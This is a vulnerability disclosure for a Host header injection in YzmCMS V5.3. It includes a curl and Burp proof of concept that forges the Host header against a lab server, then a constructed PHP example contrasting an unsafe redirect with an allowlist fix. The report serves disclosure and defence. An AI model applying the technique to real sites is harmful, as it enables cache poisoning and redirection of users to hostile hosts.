Host header injection vulnerability found on YzmCMS V5.3. Using this attack, a malicious user can poison the web cache or perform arbitrary user redirection.
PoC:
Test Environment: Windows 7 SP1(64bit)
XAMPP: 7.3.9
YzmCMS V5.3 Access Path: 192.168.30.169/yzmcms/
root@kali:~# curl http://192.168.30.169/yzmcms/member/ -H "Host: www.google.com"
<title>YzmCMS提示信息</title>
本页面将在1秒后跳转...
Or if we capture this in Burp:
GET /yzmcms/member/ HTTP/1.1
Host: 192.168.30.169
Next, change the "Host" to www.google.com and click "Go" to send the web request:

Then follow the redirection.

This will be redirected to www.google.com with a 404 response.

Capturing the response and opening it in the browser will show the following:
This was detected and emailed to you on 18-Sep-2019, but there was no response, so I am providing the information here. Thank you.
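
One way to close the behaviour reported above, as an added example that is not YzmCMS code and not part of the original report. It assumes the jump page builds its target from the Host header; the function names, the allowlist and the sample requests are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Assumption: host names this site is really served under (constructed values).
const ALLOWED_HOSTS  = ['192.168.30.169', 'cms.example.test'];
const CANONICAL_HOST = '192.168.30.169';

// Pattern consistent with the report (hypothetical, for contrast): the
// client-controlled Host header flows straight into the redirect target.
function jump_url_unsafe(array $server, string $path): string
{
    return 'http://' . ($server['HTTP_HOST'] ?? '') . $path;
}

// Hardened form: Host may only select an entry from the allowlist; any
// other value is replaced by the configured canonical host.
function jump_url_safe(array $server, string $path): string
{
    $host = strtolower((string) ($server['HTTP_HOST'] ?? ''));
    if (!in_array($host, ALLOWED_HOSTS, true)) {
        $host = CANONICAL_HOST;
    }
    return 'http://' . $host . $path;
}

// Render the "redirecting in 1 second" page with the target HTML-escaped.
function jump_page(string $url): string
{
    $safe = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    return '<meta http-equiv="refresh" content="1;url=' . $safe . '">';
}

// Constructed requests: the legitimate Host and the one used in the PoC.
foreach (['192.168.30.169', 'www.google.com'] as $hostHeader) {
    $server = ['HTTP_HOST' => $hostHeader];
    echo 'Host: ', $hostHeader, PHP_EOL;
    echo '  unsafe -> ', jump_page(jump_url_unsafe($server, '/yzmcms/member/')), PHP_EOL;
    echo '  safe   -> ', jump_page(jump_url_safe($server, '/yzmcms/member/')), PHP_EOL;
}
```

Because a cache in front of the application may key on the URL alone, rejecting or normalising unknown Host values at the web server (for example with a catch-all default virtual host) complements the application-level check.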